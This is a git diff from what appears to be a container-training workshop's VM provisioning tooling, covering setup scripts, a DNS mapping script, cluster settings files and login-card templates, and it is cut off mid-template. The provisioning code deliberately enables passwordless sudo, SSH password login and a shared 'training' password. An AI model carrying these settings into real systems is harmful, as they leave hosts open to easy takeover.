||||
syntax on
|
||||
@@ -72,8 +82,29 @@ set expandtab
|
||||
set number
|
||||
set shiftwidth=2
|
||||
set softtabstop=2
|
||||
set nowrap
|
||||
SQRL""")
|
||||
|
||||
# Custom .tmux.conf
|
||||
system(
|
||||
"""sudo -u docker tee /home/docker/.tmux.conf <<SQRL
|
||||
bind h select-pane -L
|
||||
bind j select-pane -D
|
||||
bind k select-pane -U
|
||||
bind l select-pane -R
|
||||
|
||||
# Allow using mouse to switch panes
|
||||
set -g mouse on
|
||||
|
||||
# Make scrolling with wheels work
|
||||
|
||||
bind -n WheelUpPane if-shell -F -t = "#{mouse_any_flag}" "send-keys -M" "if -Ft= '#{pane_in_mode}' 'send-keys -M' 'select-pane -t=; copy-mode -e; send-keys -M'"
|
||||
bind -n WheelDownPane select-pane -t= \; send-keys -M
|
||||
|
||||
SQRL"""
|
||||
)
|
||||
|
||||
|
||||
# add docker user to sudoers and allow password authentication
|
||||
system("""sudo tee /etc/sudoers.d/docker <<SQRL
|
||||
docker ALL=(ALL) NOPASSWD:ALL
|
||||
@@ -83,7 +114,8 @@ system("sudo sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /e
|
||||
|
||||
system("sudo service ssh restart")
|
||||
system("sudo apt-get -q update")
|
||||
system("sudo apt-get -qy install git jq python-pip")
|
||||
system("sudo apt-get -qy install git jq")
|
||||
system("sudo apt-get -qy install emacs-nox joe")
|
||||
|
||||
#######################
|
||||
### DOCKER INSTALLS ###
|
||||
@@ -98,7 +130,6 @@ system("sudo apt-get -q update")
|
||||
system("sudo apt-get -qy install docker-ce")
|
||||
|
||||
### Install docker-compose
|
||||
#system("sudo pip install -U docker-compose=={}".format(COMPOSE_VERSION))
|
||||
system("sudo curl -sSL -o /usr/local/bin/docker-compose https://github.com/docker/compose/releases/download/{}/docker-compose-{}-{}".format(COMPOSE_VERSION, platform.system(), platform.machine()))
|
||||
system("sudo chmod +x /usr/local/bin/docker-compose")
|
||||
system("docker-compose version")
|
||||
@@ -122,7 +153,7 @@ addresses = list(l.strip() for l in sys.stdin)
|
||||
assert ipv4 in addresses
|
||||
|
||||
def makenames(addrs):
|
||||
return [ "node%s"%(i+1) for i in range(len(addrs)) ]
|
||||
return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]
|
||||
|
||||
while addresses:
|
||||
cluster = addresses[:CLUSTER_SIZE]
|
||||
@@ -136,15 +167,21 @@ while addresses:
|
||||
print(cluster)
|
||||
|
||||
mynode = cluster.index(ipv4) + 1
|
||||
system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
|
||||
system("echo node{} | sudo tee /etc/hostname".format(mynode))
|
||||
system("sudo hostname node{}".format(mynode))
|
||||
system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
|
||||
system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
|
||||
system("sudo -u docker mkdir -p /home/docker/.ssh")
|
||||
system("sudo -u docker touch /home/docker/.ssh/authorized_keys")
|
||||
|
||||
# Create a convenience file to easily check if we're the first node
|
||||
if ipv4 == cluster[0]:
|
||||
# If I'm node1 and don't have a private key, generate one (with empty passphrase)
|
||||
system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
|
||||
# On the first node, if we don't have a private key, generate one (with empty passphrase)
|
||||
system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
|
||||
else:
|
||||
system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
|
||||
# Record the IPV4 and name of the first node
|
||||
system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
|
||||
system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))
|
||||
|
||||
FINISH = time.time()
|
||||
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])
|
||||
|
||||
@@ -1,12 +1,17 @@
|
||||
# This file can be sourced in order to directly run commands on
|
||||
# a batch of VMs whose IPs are located in ips.txt of the directory in which
|
||||
# a group of VMs whose IPs are located in ips.txt of the directory in which
|
||||
# the command is run.
|
||||
|
||||
pssh() {
|
||||
HOSTFILE="ips.txt"
|
||||
if [ -z "$TAG" ]; then
|
||||
>/dev/stderr echo "Variable \$TAG is not set."
|
||||
return
|
||||
fi
|
||||
|
||||
HOSTFILE="tags/$TAG/ips.txt"
|
||||
|
||||
[ -f $HOSTFILE ] || {
|
||||
>/dev/stderr echo "No hostfile found at $HOSTFILE"
|
||||
>/dev/stderr echo "Hostfile $HOSTFILE not found."
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
42
prepare-vms/lib/tailhist.html
Normal file
42
prepare-vms/lib/tailhist.html
Normal file
@@ -0,0 +1,42 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>bash history</title>
|
||||
<style>
|
||||
#log {
|
||||
font: bold 24px courier;
|
||||
}
|
||||
|
||||
#log div:last-child {
|
||||
background: yellow;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div id="log"></div>
|
||||
|
||||
<script>
|
||||
var ws = new WebSocket('ws://' + (location.host ? location.host : "localhost:8080") + "/");
|
||||
var log = document.getElementById('log');
|
||||
var echo = function(text) {
|
||||
var line = document.createElement('div');
|
||||
line.textContent = text;
|
||||
log.appendChild(line);
|
||||
line.scrollIntoView();
|
||||
}
|
||||
ws.onopen = function() {
|
||||
document.body.style.backgroundColor = '#cfc';
|
||||
};
|
||||
ws.onclose = function() {
|
||||
document.body.style.backgroundColor = '#fcc';
|
||||
echo("Disconnected from server. Try to reload this page?");
|
||||
};
|
||||
ws.onmessage = function(event) {
|
||||
echo(event.data);
|
||||
};
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
49
prepare-vms/map-dns.py
Executable file
49
prepare-vms/map-dns.py
Executable file
@@ -0,0 +1,49 @@
|
||||
#!/usr/bin/env python
|
||||
import os
|
||||
import requests
|
||||
import yaml
|
||||
|
||||
# configurable stuff
|
||||
domains_file = "../../plentydomains/domains.txt"
|
||||
config_file = os.path.join(
|
||||
os.environ["HOME"], ".config/gandi/config.yaml")
|
||||
tag = "test"
|
||||
apiurl = "https://dns.api.gandi.net/api/v5/domains"
|
||||
|
||||
# inferred stuff
|
||||
domains = open(domains_file).read().split()
|
||||
apikey = yaml.safe_load(open(config_file))["apirest"]["key"]
|
||||
ips = open(f"tags/{tag}/ips.txt").read().split()
|
||||
settings_file = f"tags/{tag}/settings.yaml"
|
||||
clustersize = yaml.safe_load(open(settings_file))["clustersize"]
|
||||
|
||||
# now do the fucking work
|
||||
while domains and ips:
|
||||
domain = domains[0]
|
||||
domains = domains[1:]
|
||||
cluster = ips[:clustersize]
|
||||
ips = ips[clustersize:]
|
||||
print(f"{domain} => {cluster}")
|
||||
zone = ""
|
||||
node = 0
|
||||
for ip in cluster:
|
||||
node += 1
|
||||
zone += f"@ 300 IN A {ip}\n"
|
||||
zone += f"* 300 IN A {ip}\n"
|
||||
zone += f"node{node} 300 IN A {ip}\n"
|
||||
r = requests.put(
|
||||
f"{apiurl}/{domain}/records",
|
||||
headers={"x-api-key": apikey},
|
||||
data=zone)
|
||||
print(r.text)
|
||||
|
||||
#r = requests.get(
|
||||
# f"{apiurl}/{domain}/records",
|
||||
# headers={"x-api-key": apikey},
|
||||
# )
|
||||
|
||||
if domains:
|
||||
print(f"Good, we have {len(domains)} domains left.")
|
||||
|
||||
if ips:
|
||||
print(f"Crap, we have {len(ips)} IP addresses left.")
|
||||
23
prepare-vms/settings/admin-dmuc.yaml
Normal file
23
prepare-vms/settings/admin-dmuc.yaml
Normal file
@@ -0,0 +1,23 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: dmuc
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
image:
|
||||
24
prepare-vms/settings/admin-kubenet.yaml
Normal file
24
prepare-vms/settings/admin-kubenet.yaml
Normal file
@@ -0,0 +1,24 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: kubenet
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
clusternumber: 100
|
||||
image:
|
||||
24
prepare-vms/settings/admin-kuberouter.yaml
Normal file
24
prepare-vms/settings/admin-kuberouter.yaml
Normal file
@@ -0,0 +1,24 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: kuberouter
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
clusternumber: 200
|
||||
image:
|
||||
23
prepare-vms/settings/admin-test.yaml
Normal file
23
prepare-vms/settings/admin-test.yaml
Normal file
@@ -0,0 +1,23 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: test
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
image:
|
||||
@@ -1,5 +1,8 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 5
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: clusters.csv
|
||||
|
||||
@@ -3,24 +3,20 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 5
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: test
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.18.0
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.13.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -3,24 +3,20 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.22.0
|
||||
compose_version: 1.25.4
|
||||
machine_version: 0.15.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
22
prepare-vms/settings/jerome.yaml
Normal file
22
prepare-vms/settings/jerome.yaml
Normal file
@@ -0,0 +1,22 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 4
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.25.4
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
@@ -1,106 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.4em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -3,25 +3,22 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: settings/kube101.html
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
docker_user_password: training
|
||||
|
||||
|
||||
@@ -3,25 +3,21 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.15.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
docker_user_password: training
|
||||
|
||||
80
prepare-vms/setup-admin-clusters.sh
Executable file
80
prepare-vms/setup-admin-clusters.sh
Executable file
@@ -0,0 +1,80 @@
|
||||
#!/bin/sh
|
||||
set -e
|
||||
|
||||
retry () {
|
||||
N=$1
|
||||
I=0
|
||||
shift
|
||||
|
||||
while ! "$@"; do
|
||||
I=$(($I+1))
|
||||
if [ $I -gt $N ]; then
|
||||
echo "FAILED, ABORTING"
|
||||
exit 1
|
||||
fi
|
||||
echo "FAILED, RETRYING ($I/$N)"
|
||||
done
|
||||
}
|
||||
|
||||
export AWS_INSTANCE_TYPE=t3a.small
|
||||
|
||||
INFRA=infra/aws-eu-west-3
|
||||
|
||||
STUDENTS=2
|
||||
|
||||
PREFIX=$(date +%Y-%m-%d-%H-%M)
|
||||
|
||||
SETTINGS=admin-dmuc
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--count $STUDENTS
|
||||
|
||||
retry 5 ./workshopctl deploy $TAG
|
||||
retry 5 ./workshopctl disabledocker $TAG
|
||||
retry 5 ./workshopctl kubebins $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
SETTINGS=admin-kubenet
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
retry 5 ./workshopctl disableaddrchecks $TAG
|
||||
retry 5 ./workshopctl deploy $TAG
|
||||
retry 5 ./workshopctl kubebins $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
SETTINGS=admin-kuberouter
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
retry 5 ./workshopctl disableaddrchecks $TAG
|
||||
retry 5 ./workshopctl deploy $TAG
|
||||
retry 5 ./workshopctl kubebins $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
#INFRA=infra/aws-us-west-1
|
||||
|
||||
export AWS_INSTANCE_TYPE=t3a.medium
|
||||
|
||||
SETTINGS=admin-test
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
retry 5 ./workshopctl deploy $TAG
|
||||
retry 5 ./workshopctl kube $TAG 1.15.9
|
||||
./workshopctl cards $TAG
|
||||
290
prepare-vms/templates/cards.html
Normal file
290
prepare-vms/templates/cards.html
Normal file
@@ -0,0 +1,290 @@
|
||||
{#
|
||||
The variables below can be customized here directly, or in your
|
||||
settings.yaml file. Any variable in settings.yaml will be exposed
|
||||
in here as well.
|
||||
#}
|
||||
|
||||
{%- set url = url
|
||||
| default("http://FIXME.container.training/") -%}
|
||||
{%- set pagesize = pagesize
|
||||
| default(9) -%}
|
||||
{%- set lang = lang
|
||||
| default("en") -%}
|
||||
{%- set event = event
|
||||
| default("training session") -%}
|
||||
{%- set backside = backside
|
||||
| default(False) -%}
|
||||
{%- set image = image
|
||||
| default("kube") -%}
|
||||
{%- set clusternumber = clusternumber
|
||||
| default(None) -%}
|
||||
{%- if qrcode == True -%}
|
||||
{%- set qrcode = "https://container.training/q" -%}
|
||||
{%- elif qrcode -%}
|
||||
{%- set qrcode = qrcode -%}
|
||||
{%- endif -%}
|
||||
|
||||
{# You can also set img_bottom_src instead. #}
|
||||
{%- set img_logo_src = {
|
||||
"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
|
||||
"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
|
||||
"kube": "https://avatars1.githubusercontent.com/u/13629408",
|
||||
"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
|
||||
}[image] -%}
|
||||
{%- if lang == "en" and clustersize == 1 -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
machine for this {{ event }}.
|
||||
You can connect to this VM with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Your machine is:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" and clustersize != 1 -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
cluster for this {{ event }}.
|
||||
You can connect to each VM with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Your machines are:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" and clustersize == 1 -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
machine pour cette formation.
|
||||
Vous pouvez vous connecter à cette machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Adresse IP:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" and clusterprefix != "node" -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information for the
|
||||
<strong>{{ clusterprefix }}</strong> environment.
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" and clustersize != 1 -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
cluster pour cette formation.
|
||||
Vous pouvez vous connecter à chaque machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Adresses IP:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" -%}
|
||||
{%- set slides_are_at -%}
|
||||
You can find the slides at:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" -%}
|
||||
{%- set slides_are_at -%}
|
||||
Le support de formation est à l'adresse suivante :
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head>
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
{% if paper_size == "A4" %}
|
||||
@page {
|
||||
size: A4; /* Change from the default size of A4 */
|
||||
margin: 0.5cm; /* Set margin on each page */
|
||||
}
|
||||
body {
|
||||
/* this is A4 minus 0.5cm margins */
|
||||
width: 20cm;
|
||||
height: 28.7cm;
|
||||
}
|
||||
{% elif paper_size == "Letter" %}
|
||||
@page {
|
||||
size: Letter;
|
||||
margin: 0.2in;
|
||||
}
|
||||
body {
|
||||
/* this is Letter minus 0.2in margins */
|
||||
width: 8.6in;
|
||||
heigth: 10.6in;
|
||||
}
|
||||
{% endif %}
|
||||
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
{% if backside %}
|
||||
height: 33%;
|
||||
{% endif %}
|
||||
/* columns * (width+left+right) < 100% */
|
||||
/*
|
||||
width: 24.8%;
|
||||
*/
|
||||
/**/
|
||||
width: 33%;
|
||||
/**/
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.8em;
|
||||
}
|
||||
|
||||
div.back {
|
||||
border: 1px dotted grey;
|
||||
}
|
||||
|
||||
span.scale {
|
||||
white-space: nowrap;
|
||||
}
|
||||
|
||||
img.logo {
|
||||
height: 4.5em;
|
||||
float: right;
|
||||
}
|
||||
|
||||
img.bottom {
|
||||
height: 2.5em;
|
||||
display: block;
|
||||
margin: 0.5em auto;
|
||||
}
|
||||
|
||||
.qrcode img {
|
||||
width: 40%;
|
||||
margin: 1em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 0;
|
||||
}
|
||||
</style>
|
||||
<script type="text/javascript" src="https://cdn.rawgit.com/davidshimjs/qrcodejs/gh-pages/qrcode.min.js"></script>
|
||||
<script type="text/javascript">
|
||||
function qrcodes() {
|
||||
[].forEach.call(
|
||||
document.getElementsByClassName("qrcode"),
|
||||
(e, index) => {
|
||||
new QRCode(e, {
|
||||
text: "{{ qrcode }}",
|
||||
correctLevel: QRCode.CorrectLevel.L
|
||||
});
|
||||
}
|
||||
);
|
||||
}
|
||||
|
||||
function scale() {
|
||||
[].forEach.call(
|
||||
document.getElementsByClassName("scale"),
|
||||
(e, index) => {
|
||||
var text_width = e.getBoundingClientRect().width;
|
||||
var box_width = e.parentElement.getBoundingClientRect().width;
|
||||
var percent = 100 * box_width / text_width + "%";
|
||||
e.style.fontSize = percent;
|
||||
}
|
||||
);
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="qrcodes(); scale();">
|
||||
{% for cluster in clusters %}
|
||||
<div>
|
||||
<p>{{ intro }}</p>
|
||||
<p>
|
||||
{% if img_logo_src %}
|
||||
<img class="logo" src="{{ img_logo_src }}" />
|
||||
{% endif %}
|
||||
<table>
|
||||
{% if clusternumber != None %}
|
||||
<tr><td>cluster:</td></tr>
|
||||
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
|
||||
{% endif %}
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
{{ listhead }}
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr>
|
||||
<td>{{ clusterprefix }}{{ loop.index }}:</td>
|
||||
